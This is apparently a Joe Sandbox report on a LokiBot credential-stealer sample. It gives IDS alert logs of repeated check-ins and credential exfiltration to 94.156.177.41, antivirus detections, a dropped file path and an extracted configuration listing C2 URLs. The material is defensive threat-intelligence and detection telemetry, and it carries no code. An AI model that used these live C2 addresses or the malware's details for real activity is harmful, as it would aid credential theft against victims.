2025-01-11T08:37:55.447402+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50021	94.156.177.41	80	TCP
2025-01-11T08:37:56.296589+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50022	94.156.177.41	80	TCP
2025-01-11T08:37:57.168024+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50023	94.156.177.41	80	TCP
2025-01-11T08:37:58.108290+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50024	94.156.177.41	80	TCP
2025-01-11T08:37:58.997732+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50025	94.156.177.41	80	TCP
2025-01-11T08:37:59.881352+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50027	94.156.177.41	80	TCP
2025-01-11T08:38:00.923865+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50028	94.156.177.41	80	TCP
2025-01-11T08:38:01.801642+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50029	94.156.177.41	80	TCP
2025-01-11T08:38:02.929554+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50030	94.156.177.41	80	TCP
2025-01-11T08:38:03.788440+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50031	94.156.177.41	80	TCP
2025-01-11T08:38:04.654751+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50032	94.156.177.41	80	TCP
2025-01-11T08:38:05.736766+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50033	94.156.177.41	80	TCP
2025-01-11T08:38:06.637553+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50034	94.156.177.41	80	TCP
2025-01-11T08:38:07.543493+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50035	94.156.177.41	80	TCP
2025-01-11T08:38:08.535138+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50036	94.156.177.41	80	TCP
2025-01-11T08:38:09.430836+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50037	94.156.177.41	80	TCP
2025-01-11T08:38:10.296978+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50038	94.156.177.41	80	TCP
2025-01-11T08:38:11.151744+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50039	94.156.177.41	80	TCP
2025-01-11T08:38:12.040089+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50040	94.156.177.41	80	TCP
2025-01-11T08:38:12.949663+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50041	94.156.177.41	80	TCP
2025-01-11T08:38:13.842179+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50042	94.156.177.41	80	TCP
2025-01-11T08:38:14.714006+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50043	94.156.177.41	80	TCP
2025-01-11T08:38:15.727832+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50044	94.156.177.41	80	TCP
2025-01-11T08:38:16.602139+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50045	94.156.177.41	80	TCP
2025-01-11T08:38:17.480431+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50046	94.156.177.41	80	TCP
2025-01-11T08:38:18.361971+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50047	94.156.177.41	80	TCP
2025-01-11T08:38:19.243600+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50048	94.156.177.41	80	TCP
2025-01-11T08:38:20.125882+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50049	94.156.177.41	80	TCP
2025-01-11T08:38:21.374944+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50050	94.156.177.41	80	TCP
2025-01-11T08:38:22.229791+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50051	94.156.177.41	80	TCP
2025-01-11T08:38:23.088593+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50052	94.156.177.41	80	TCP
2025-01-11T08:38:24.220880+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50053	94.156.177.41	80	TCP
2025-01-11T08:38:25.073323+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50054	94.156.177.41	80	TCP
2025-01-11T08:38:25.957719+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50055	94.156.177.41	80	TCP
2025-01-11T08:38:26.972510+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50056	94.156.177.41	80	TCP
2025-01-11T08:38:27.976208+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50057	94.156.177.41	80	TCP
2025-01-11T08:38:28.837379+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50058	94.156.177.41	80	TCP
2025-01-11T08:38:29.840822+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50059	94.156.177.41	80	TCP
2025-01-11T08:38:30.693073+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50060	94.156.177.41	80	TCP
2025-01-11T08:38:31.577126+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50061	94.156.177.41	80	TCP
2025-01-11T08:38:32.460501+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50062	94.156.177.41	80	TCP
2025-01-11T08:38:33.646503+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50063	94.156.177.41	80	TCP
2025-01-11T08:38:34.530472+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50064	94.156.177.41	80	TCP
2025-01-11T08:38:35.510279+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50065	94.156.177.41	80	TCP
2025-01-11T08:38:36.471295+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50066	94.156.177.41	80	TCP
2025-01-11T08:38:37.336378+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50067	94.156.177.41	80	TCP
2025-01-11T08:38:38.202393+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50068	94.156.177.41	80	TCP
2025-01-11T08:38:39.238877+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50069	94.156.177.41	80	TCP
2025-01-11T08:38:40.130128+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50070	94.156.177.41	80	TCP
2025-01-11T08:38:41.012348+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50071	94.156.177.41	80	TCP
2025-01-11T08:38:41.968094+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50072	94.156.177.41	80	TCP
2025-01-11T08:38:42.823353+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50073	94.156.177.41	80	TCP
2025-01-11T08:38:43.698121+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50074	94.156.177.41	80	TCP
2025-01-11T08:38:44.595801+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50075	94.156.177.41	80	TCP
2025-01-11T08:38:45.627870+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50076	94.156.177.41	80	TCP
2025-01-11T08:38:46.516711+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50077	94.156.177.41	80	TCP
2025-01-11T08:38:47.424671+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50078	94.156.177.41	80	TCP
2025-01-11T08:38:48.273476+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50079	94.156.177.41	80	TCP
2025-01-11T08:38:49.116902+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50080	94.156.177.41	80	TCP
2025-01-11T08:38:49.960016+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50081	94.156.177.41	80	TCP
2025-01-11T08:38:50.825321+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50082	94.156.177.41	80	TCP
2025-01-11T08:38:51.695758+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50083	94.156.177.41	80	TCP
2025-01-11T08:38:52.555444+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50084	94.156.177.41	80	TCP
2025-01-11T08:38:53.414347+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50085	94.156.177.41	80	TCP
2025-01-11T08:38:54.273813+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50086	94.156.177.41	80	TCP
2025-01-11T08:38:55.134435+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50087	94.156.177.41	80	TCP
2025-01-11T08:38:56.036472+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50088	94.156.177.41	80	TCP
2025-01-11T08:38:56.987645+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50089	94.156.177.41	80	TCP
2025-01-11T08:38:57.870196+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50090	94.156.177.41	80	TCP
2025-01-11T08:38:58.710492+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50091	94.156.177.41	80	TCP
2025-01-11T08:38:59.655514+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50092	94.156.177.41	80	TCP
2025-01-11T08:39:00.512250+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50093	94.156.177.41	80	TCP
2025-01-11T08:39:01.365444+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50094	94.156.177.41	80	TCP
2025-01-11T08:39:02.473916+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50095	94.156.177.41	80	TCP
2025-01-11T08:39:03.353242+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50096	94.156.177.41	80	TCP
2025-01-11T08:39:04.211638+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50097	94.156.177.41	80	TCP
2025-01-11T08:39:05.111899+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50098	94.156.177.41	80	TCP
2025-01-11T08:39:06.002182+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50099	94.156.177.41	80	TCP
2025-01-11T08:39:06.979552+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50100	94.156.177.41	80	TCP
2025-01-11T08:39:07.899333+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50101	94.156.177.41	80	TCP
2025-01-11T08:39:08.814632+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50102	94.156.177.41	80	TCP
2025-01-11T08:39:09.685224+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50103	94.156.177.41	80	TCP
2025-01-11T08:39:10.558443+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50104	94.156.177.41	80	TCP
2025-01-11T08:39:11.462948+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.9	50105	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: kzQ25HVUbf.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://94.156.177.41/soja/five/fre.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

Avira: detection malicious, Label: HEUR/AGEN.1309499

Found malware configuration

Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: kzQ25HVUbf.exe	ReversingLabs: Detection: 65%
Source: kzQ25HVUbf.exe	Virustotal: Detection: 73%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: kzQ25HVUbf.exe

Joe Sandbox ML: detected

Source: kzQ25HVUbf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: kzQ25HVUbf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: DJsZ.pdb source: kzQ25HVUbf.exe, iWEWjTXiqXke.exe.0.dr
Source:	Binary string: DJsZ.pdbSHA256p source: kzQ25HVUbf.exe, iWEWjTXiqXke.exe.0.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.9:49804 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49876 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.9:49811 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49876 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49848 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49828 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49834 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49870 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49895 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49870 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49870 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49923 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49911 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49895 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49895 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49870 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49904 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49904 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49904 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49923 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49817 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49904 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49817 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49817 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49895 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49952 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49952 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49952 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49923 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49952 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49929 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49929 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49929 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49946 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49923 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49946 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49946 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49817 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49929 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49958 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49972 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49972 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49841 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49980 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49980 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49980 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49917 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49987 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49987 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49876 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49987 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50018 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50006 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50006 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49987 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50018 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49980 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49876 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49972 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50024 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50023 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50023 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50023 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50018 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50006 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50024 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50032 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50024 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50010 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50018 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50023 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50032 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50020 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50038 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50032 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49972 -> 94.156.177.41:80
